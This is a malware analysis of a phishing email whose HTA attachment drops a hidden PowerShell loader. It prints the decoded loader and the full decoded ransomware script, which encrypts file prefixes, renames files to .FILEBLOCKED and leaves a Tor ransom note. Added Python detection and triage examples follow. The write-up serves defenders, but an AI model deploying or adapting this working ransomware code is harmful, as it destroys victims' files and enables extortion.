This email was a reply to what seemed to be a completely legitimate email from a client.
The reply contained a password-protected .rar file named after the recipient (the name was possibly taken from the first and last name in an unsuspecting sender's contact list).
The reply message:
Hi, I attach a scanned copy of the letter to this email.
I have packed the file in the archive. The password for the archive is: 12345
Decompressing the .rar yielded a single file, “letter.hta”. The .hta source consisted of a large chunk of code obfuscated with VBScript.Encode (the Microsoft Script Encoder format).
After decoding the source, the result was:
Const SYSTEM32 = &H25
Set oFileSystem = CreateObject("Scripting.FileSystemObject")
Set oShell = CreateObject("Shell.Application")
Set WshShell = CreateObject( "WScript.Shell" )
' Resolve the System32 folder through the shell namespace (CSIDL &H25)
Set oFolder = oShell.Namespace(SYSTEM32)
Set oFolderItem = oFolder.Self
' Drop the base64-encoded PowerShell stage into %TMP%\test.txt (the blob itself is not reproduced in this listing)
Set oEncryptScript = oFileSystem.CreateTextFile(WshShell.ExpandEnvironmentStrings("%TMP%") & "\test.txt", True)
oEncryptScript.WriteLine("")
' PowerShell reads the first line of that file, base64-decodes it and executes it with iex
powershellArguments = " -command $path=(gc -Path '" + WshShell.ExpandEnvironmentStrings("%TMP%") & "\test.txt" + "' -totalcount 1); $bytes = [System.Convert]::FromBase64String($path); $decoded = [System.Text.Encoding]::UTF8.GetString($bytes); iex $decoded"
powershellPath = oFolderItem.Path + "\WindowsPowerShell\v1.0\powershell.exe"
fullPowershellCommand = powershellPath + powershellArguments
If (oFileSystem.FileExists(powershellPath)) Then
    ' Window style 0: run hidden, do not wait
    WshShell.Run fullPowershellCommand, 0, False
Else
    ' No PowerShell: nag the user to install KB968930 (Windows Management Framework Core) disguised as a Windows Update
    MsgBox "You need to download update for Windows XP KB968930(size 5.9 MB)" & Chr(13) & "Press OK to open www.microsoft.com, download and install update for your operation system.", 48, "Windows Update"
    WshShell.Run "http://www.microsoft.com/en-us/download/details.aspx?id=16818"
End If
This code creates a file at “%TMP%\test.txt”, writes the base64-encoded payload into it (the blob itself does not appear in the listing above), checks that PowerShell is installed (and, if not, prompts the user to install it via a Microsoft download link dressed up as a Windows Update), then launches PowerShell with a hidden window to base64-decode the file and execute the result with iex (Invoke-Expression).
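The process chain described above (mshta.exe spawning a hidden PowerShell that reads a file under %TMP%, base64-decodes it and passes it to iex) is a good detection anchor. The following is an added example, not code from the original post: it scores constructed process-creation events against indicators derived from the decoded VBScript; the regexes, field names and sample paths are assumptions.

```python
import re

# Indicators of the launcher shown above: an HTA (run by mshta.exe) starts a hidden
# PowerShell that reads one line from a file under %TMP%, base64-decodes it and hands
# the result to iex. The patterns are assumptions derived from the decoded VBScript.
INDICATORS = {
    "reads_tmp_file": re.compile(r"(gc|get-content)\s+-path\s+'[^']*\\temp\\[^']*'", re.I),
    "base64_decode": re.compile(r"frombase64string", re.I),
    "invoke_expr": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "inline_command": re.compile(r"\s-c(ommand)?\s", re.I),
}


def score_powershell_launch(parent_image, image, command_line):
    """Score one process-creation event (Sysmon event 1 / Windows 4688 fields).
    'suspicious': PowerShell both base64-decodes and iex-executes something;
    'hta_loader': additionally parented by mshta.exe, the chain this sample produces.
    """
    hits = [name for name, rx in INDICATORS.items() if rx.search(command_line)]
    is_ps = image.lower().endswith("powershell.exe")
    decode_exec = {"base64_decode", "invoke_expr"} <= set(hits)
    verdict = "benign"
    if is_ps and decode_exec:
        verdict = "hta_loader" if parent_image.lower().endswith("mshta.exe") else "suspicious"
    return {"hits": hits, "verdict": verdict}


# Constructed sample events (not real telemetry); the first mirrors the HTA's command line.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\mshta.exe", "image": PS,
     "cmd": r"powershell.exe -command $path=(gc -Path 'C:\Users\victim\AppData\Local\Temp\test.txt' "
            r"-totalcount 1); $bytes = [System.Convert]::FromBase64String($path); "
            r"$decoded = [System.Text.Encoding]::UTF8.GetString($bytes); iex $decoded"},
    {"parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmd": r"powershell.exe -NoProfile -File C:\Scripts\nightly-backup.ps1"},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": PS,  # same decode+iex, no HTA parent
     "cmd": r"powershell.exe -command $b=[System.Convert]::FromBase64String((gc C:\Users\victim\Downloads\stage.txt)); iex ([System.Text.Encoding]::UTF8.GetString($b))"},
]


def scan(events):
    """Return (parent process name, verdict) for each event."""
    return [(e["parent"].rsplit("\\", 1)[-1],
             score_powershell_launch(e["parent"], e["image"], e["cmd"])["verdict"]) for e in events]


if __name__ == "__main__":
    for parent, verdict in scan(SAMPLE_EVENTS):
        print(f"{parent:14} -> {verdict}")
```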
After decoding the base64 string, the result is:
$ErrorActionPreference="SilentlyContinue";
# Bail out if another PowerShell instance is already running (avoids a second copy)
if((gps -Name powershell).count -ge 2){exit}
$ref=[Reflection.Assembly]::LoadWithPartialName('System.Security');
Add-Type -Assembly System.Web;
# Per-victim marker file in %APPDATA%, named after the computer model
$idpath=$env:APPDATA+"\"+(gwmi win32_computersystem).model;
if!(Test-Path $idpath){ exit } # original comment in transliterated Russian: if the file exists, get out
# File-encryption key: 41 random characters plus the OS major version and two constants
$ek=[Web.Security.Membership]::GeneratePassword(41, 4);
$ek=$ek+((gwmi Win32_operatingsystem).Version).Substring(0,3)+"001"+"001";
[byte[]]$bytes=[system.Text.Encoding]::Unicode.GetBytes($ek);
Set-Content -Path $idpath -Value $ek.Substring(20,2);
# Attacker's embedded RSA public key (base64-encoded CSP blob); the file key is encrypted with it
$basekey="BgIAAACkAABSU0ExAAQAAAEAAQDTYUZyVxhh48R/1Y/H5NdEgi49DIHtJTXm+mcVHnvUpYiNEnxpFj/UJXVDg0F2rfWFpnyqHJ0dbyjsOCwMX0eRyp2VxrWFzOHIM6QpevxGF9izXeNq7+OzBuo11V/7EmvQBW2sfuNEOP7zdUw0DFKoK+X2Taewaki1LGYhpshjqg==";
$rsa=New-Object System.Security.Cryptography.RSACryptoServiceProvider;
$rsa.ImportCspBlob([system.Convert]::FromBase64String($basekey));
$enckey=[system.Convert]::ToBase64String($rsa.Encrypt($bytes, $false));
# Ransom note HTML; the RSA-encrypted key is embedded as the victim's "personal ID"
$text="<style>body{background-color:#30BDEB;}a:link{color:white;}a:visited{color:white;}a:visited{color:white;}</style><center> If you read this message, it means that your computer was attacked by viruses. All of your information (documents, films and other files) on this computer was encoded with the most cryptographically secure algorythm in the world RSA1024. In order to restore your files, it is essential to download special browser and go to site <b>http://decoderswlezrsa7.onion</b><br><br>Sites in .onion band needs to visit using dedicated browser, follow these instructions and download it: 1. Go to page <a href='https://www.torproject.org/download/download-easy.html.en' target='_blank'>https://www.torproject.org/download/download-easy.html.en</a> and download TOR browser, and save it somewhere, then double click on it. Click on the button labeled '...' (1) and select where you want to save the bundle then click OK (2). At least 80 MB free space must be available in the location you select. If you want to leave the bundle on the computer, saving it to the Desktop is a good choice. Click Extract (3) to begin extraction. This may take a few minutes to complete. <img src='https://www.torproject.org/images/tbb-screenshot1.png'></img> 2. Once extraction is complete, open the folder Tor Browser from the location you saved the bundle. Double click on the Start Tor Browser (4) application (it called Start Tor Browser.exe) <img src='https://www.torproject.org/images/tbb-screenshot2.png'></img> 3. Once Tor is ready, Tor Browser will automatically be opened. Only web pages visited through Tor Browser will be sent via Tor. Other web browsers such as Internet Explorer are not affected. If you did everything correctly, you will see in the browser window: 'Congratulations. Your browser is configured to use Tor.'<br><br><img src='https://www.torproject.org/images/tbb-screenshot3.png'></img> 4. Now go to website <b>http://decoderswlezrsa7.onion</b> in tor browser and follow the instructions. Your personal ID: <input value='"+$enckey+"'></center>";
function Encrypt-File($item, $Passphrase){
    $salt="FILEBLOCKED scrypt";
    $init="FILEBLOCKED INIT";
    $r=new-Object System.Security.Cryptography.RijndaelManaged;
    $pass=[Text.Encoding]::UTF8.GetBytes($Passphrase);
    $salt=[Text.Encoding]::UTF8.GetBytes($salt);
    # AES-256 key via PasswordDeriveBytes (PBKDF1, SHA1, 5 iterations); IV is the first 16 bytes of SHA1 of a fixed string
    $r.Key=(new-Object Security.Cryptography.PasswordDeriveBytes $pass, $salt, "SHA1", 5).GetBytes(32);
    $r.IV=(new-Object Security.Cryptography.SHA1Managed).ComputeHash([Text.Encoding]::UTF8.GetBytes($init))[0..15];
    $r.Padding="Zeros";
    $r.Mode="CBC";
    $c=$r.CreateEncryptor();
    $ms=new-Object IO.MemoryStream;
    $cs=new-Object Security.Cryptography.CryptoStream $ms,$c,"Write";
    $cs.Write($item, 0,$item.Length);
    $cs.Close();
    $ms.Close();
    $r.Clear();
    return $ms.ToArray();
}
# Every drive with more than 50000 free bytes, largest first
$disks=gdr|where{$_.Free -gt 50000}|sort -Descending;
foreach($disk in $disks){
    gci $disk.root -Recurse -Include "*.doc","*.xls","*.docx","*.xlsx","*.db","*.mp3","*.waw","*.jpg","*.jpeg","*.txt","*.rtf","*.pdf","*.rar","*.zip","*.psd","*.msi","*.tif","*.wma","*.lnk","*.gif","*.bmp","*.ppt","*.pptx","*.docm","*.xlsm","*.pps","*.ppsx","*.ppd","*.tiff","*.eps","*.png","*.ace","*.djvu","*.xml","*.cdr","*.max","*.wmv","*.avi","*.wav","*.mp4","*.pdd","*.html","*.css","*.php","*.aac","*.ac3","*.amf","*.amr","*.mid","*.midi","*.mmf","*.mod","*.mp1","*.mpa","*.mpga","*.mpu","*.nrt","*.oga","*.ogg","*.pbf","*.ra","*.ram","*.raw","*.saf","*.val","*.wave","*.wow","*.wpk","*.3g2","*.3gp","*.3gp2","*.3mm","*.amx","*.avs","*.bik","*.bin","*.dir","*.divx","*.dvx","*.evo","*.flv","*.qtq","*.tch","*.rts","*.rum","*.rv","*.scn","*.srt","*.stx","*.svi","*.swf","*.trp","*.vdo","*.wm","*.wmd","*.wmmp","*.wmx","*.wvx","*.xvid","*.3d","*.3d4","*.3df8","*.pbs","*.adi","*.ais","*.amu","*.arr","*.bmc","*.bmf","*.cag","*.cam","*.dng","*.ink","*.jif","*.jiff","*.jpc","*.jpf","*.jpw","*.mag","*.mic","*.mip","*.msp","*.nav","*.ncd","*.odc","*.odi","*.opf","*.qif","*.qtiq","*.srf","*.xwd","*.abw","*.act","*.adt","*.aim","*.ans","*.asc",
        "*.ase","*.bdp","*.bdr","*.bib","*.boc","*.crd","*.diz","*.dot","*.dotm","*.dotx","*.dvi","*.dxe","*.mlx","*.err","*.euc","*.faq","*.fdr","*.fds","*.gthr","*.idx","*.kwd","*.lp2","*.ltr","*.man","*.mbox","*.msg","*.nfo","*.now","*.odm","*.oft","*.pwi","*.rng","*.rtx","*.run","*.ssa","*.text","*.unx","*.wbk","*.wsh","*.7z","*.arc","*.ari","*.arj","*.car","*.cbr","*.cbz","*.gz","*.gzig","*.jgz","*.pak","*.pcv","*.puz","*.r00","*.r01","*.r02","*.r03","*.rev","*.sdn","*.sen","*.sfs","*.sfx","*.sh","*.shar","*.shr","*.sqx","*.tbz2","*.tg","*.tlz","*.vsi","*.wad","*.war","*.xpi","*.z02","*.z04","*.zap","*.zipx","*.zoo","*.ipa","*.isu","*.jar","*.js","*.udf","*.adr","*.ap","*.aro","*.asa","*.ascx","*.ashx","*.asmx","*.asp","*.aspx","*.asr","*.atom","*.bml","*.cer","*.cms","*.crt","*.dap","*.htm","*.moz","*.svr","*.url","*.wdgt","*.abk","*.bic","*.big","*.blp","*.bsp","*.cgf","*.chk","*.col","*.cty","*.dem","*.elf","*.ff","*.gam","*.grf","*.h3m","*.h4r","*.iwd","*.ldb","*.lgp","*.lvl","*.map","*.md3","*.mdl","*.mm6","*.mm7","*.mm8","*.nds","*.pbp","*.ppf","*.pwf","*.pxp","*.sad","*.sav","*.scm","*.scx","*.sdt","*.spr","*.sud","*.uax","*.umx","*.unr","*.uop","*.usa","*.usx","*.ut2","*.ut3","*.utc","*.utx","*.uvx","*.uxx","*.vmf","*.vtf","*.w3g","*.w3x","*.wtd","*.wtf","*.ccd","*.cd","*.cso","*.disk","*.dmg","*.dvd","*.fcd","*.flp","*.img","*.iso","*.isz","*.md0","*.md1","*.md2","*.mdf","*.mds","*.nrg","*.nri","*.vcd","*.vhd","*.snp","*.bkf","*.ade","*.adpb","*.dic","*.cch","*.ctt","*.dal","*.ddc","*.ddcx","*.dex","*.dif","*.dii","*.itdb","*.itl","*.kmz","*.lcd","*.lcf","*.mbx","*.mdn","*.odf","*.odp","*.ods","*.pab","*.pkb","*.pkh","*.pot","*.potx","*.pptm","*.psa","*.qdf","*.qel","*.rgn","*.rrt","*.rsw","*.rte","*.sdb","*.sdc","*.sds","*.sql","*.stt","*.t01","*.t03","*.t05","*.tcx","*.thmx","*.txd","*.txf","*.upoi","*.vmt","*.wks","*.wmdb","*.xl","*.xlc","*.xlr","*.xlsb","*.xltx","*.ltm","*.xlwx","*.mcd","*.cap","*.cc","*.cod","*.cp","*.cpp","*.cs","*.csi","*.dcp","*.dcu",
        "*.dev","*.dob","*.dox","*.dpk","*.dpl","*.dpr","*.dsk","*.dsp","*.eql","*.ex","*.f90","*.fla","*.for","*.fpp","*.jav","*.java","*.lbi","*.owl","*.pl","*.plc","*.pli","*.pm","*.res","*.rnc","*.rsrc","*.so","*.swd","*.tpu","*.tpx","*.tu","*.tur","*.vc","*.yab","*.8ba","*.8bc","*.8be","*.8bf","*.8bi8","*.bi8","*.8bl","*.8bs","*.8bx","*.8by","*.8li","*.aip","*.amxx","*.ape","*.api","*.mxp","*.oxt","*.qpx","*.qtr","*.xla","*.xlam","*.xll","*.xlv","*.xpt","*.cfg","*.cwf","*.dbb","*.slt","*.bp2","*.bp3","*.bpl","*.clr","*.dbx","*.jc","*.potm","*.ppsm","*.prc","*.prt","*.shw","*.std","*.ver","*.wpl","*.xlm","*.yps","*.md3","*.1cd"| %{
        try{
            $file=[io.file]::Open($_, 'Open', 'ReadWrite');
            # Only the first 40960 bytes of each file are read, encrypted and written back in place
            if($file.Length -lt "40960"){ $size=$file.Length}else{$size="40960"}
            [byte[]]$buff = new-object byte[] $size;
            $ToEncrypt=$file.Read($buff, 0, $buff.Length);
            $file.Position='0';
            $Encrypted=Encrypt-File $buff $ek;
            $file.Write($Encrypted, 0, $Encrypted.Length);
            $file.Close();
            $newname=$_.Name+'.FILEBLOCKED';
            ren -Path $_.FullName -NewName $newname -Force;
            # One ransom note per affected directory
            $path=$_.DirectoryName+'\READ_ME_NOW.html';
            if(!(Test-Path $path)){sc -pat $path -va $text}
        }catch{}
    }
}
The PowerShell script then walks every drive with more than 50,000 bytes free, encrypts the first 40,960 bytes of every file whose extension appears in the list (Microsoft Office files, documents, multimedia, archives, source code, etc.) with AES in CBC mode under a randomly generated key, appends the “.FILEBLOCKED” extension, and drops a READ_ME_NOW.html ransom note in each affected directory. The file key is RSA-encrypted with the attacker's embedded public key and shown in the note as the victim's “personal ID”, so recovering it requires the attacker's private key.
The user is then given instructions to download the Tor Browser, visit a .onion site, and (presumably) pay for the decryption key and routine.
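One point worth using in triage: the loop only ever encrypts the first 40,960 bytes of a file, so anything beyond that offset in a larger file is untouched. The following is an added example, not part of the original post: it walks a directory tree for this sample's artefacts (the .FILEBLOCKED marker and READ_ME_NOW.html notes, both from the decoded script) and reports how much of each file was actually overwritten; the sample tree and its placeholder contents are constructed.

```python
import tempfile
from pathlib import Path

# Values taken from the decoded script above: marker extension, ransom note name and
# the fixed number of leading bytes the encryption loop reads and overwrites.
MARKER_EXT = ".FILEBLOCKED"
NOTE_NAME = "READ_ME_NOW.html"
PREFIX_LEN = 40960


def encrypted_region(file_size):
    """Return (encrypted_bytes, intact_tail_bytes) for a file of this on-disk size.
    The loop reads min(length, 40960) bytes, AES-CBC encrypts them with Zeros padding and
    writes them back at offset 0. 40960 is a multiple of the 16-byte block, so larger files
    get exactly 40960 encrypted bytes and an untouched tail; smaller files are encrypted whole.
    """
    if file_size >= PREFIX_LEN:
        return PREFIX_LEN, file_size - PREFIX_LEN
    return file_size, 0


def triage(root):
    """Walk a tree and list this sample's artefacts: renamed files and ransom notes."""
    report = {"encrypted": [], "notes": [], "recoverable_tail_bytes": 0}
    for path in Path(root).rglob("*"):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        if path.name == NOTE_NAME:
            report["notes"].append(rel)
        elif path.suffix == MARKER_EXT:
            enc, tail = encrypted_region(path.stat().st_size)
            report["encrypted"].append((rel, enc, tail))
            report["recoverable_tail_bytes"] += tail
    return report


def demo():
    """Build a constructed sample tree (placeholder bytes, not victim data) and triage it."""
    root = Path(tempfile.mkdtemp(prefix="fileblocked_"))
    (root / "docs").mkdir()
    (root / "docs" / ("report.docx" + MARKER_EXT)).write_bytes(b"\x00" * 4096)    # small: fully encrypted
    (root / "docs" / ("backup.zip" + MARKER_EXT)).write_bytes(b"\x00" * 100000)   # large: 59040-byte intact tail
    (root / "docs" / NOTE_NAME).write_text("<html>ransom note placeholder</html>")
    (root / "notes.txt").write_text("untouched file")                               # no marker, ignored
    return triage(root)


if __name__ == "__main__":
    print(demo())
```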